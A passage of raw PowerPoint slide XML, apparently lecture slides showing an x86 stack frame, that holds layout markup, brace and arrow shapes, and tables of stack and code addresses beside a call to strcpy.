              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003537" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="990600"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003538" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="4800600"/>
            <a:ext cx="3810000" cy="4000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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003539" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905000" cy="4000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endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003541" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="338554" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="4726781"/>
            <a:ext cx="114300" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 70833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003544" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="2762250"/>
            <a:ext cx="228600" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 95833"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173349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35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35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352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0352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0352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0352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0352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0352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035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035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035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0353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0353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0353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00353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00353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00354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00354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00354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00354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0035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31" grpId="0" animBg="1"/>
      <p:bldP spid="1003532" grpId="0" animBg="1"/>
      <p:bldP spid="1003533" grpId="0" animBg="1"/>
      <p:bldP spid="1003534" grpId="0"/>
      <p:bldP spid="1003535" grpId="0"/>
      <p:bldP spid="1003536" grpId="0" animBg="1"/>
      <p:bldP spid="1003537" grpId="0" animBg="1"/>
      <p:bldP spid="1003538" grpId="0" animBg="1"/>
      <p:bldP spid="1003539" grpId="0" animBg="1"/>
      <p:bldP spid="1003541" grpId="0"/>
      <p:bldP spid="1003542" grpId="0"/>
      <p:bldP spid="1003543" grpId="0" animBg="1"/>
      <p:bldP spid="1003544" grpId="0" animBg="1"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42892" y="173007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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="793310540"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff698</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0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048400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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771234" y="115215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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547168710"/>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989276074"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1643133603"/>
              </p:ext>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0xbffff65c</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048403</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
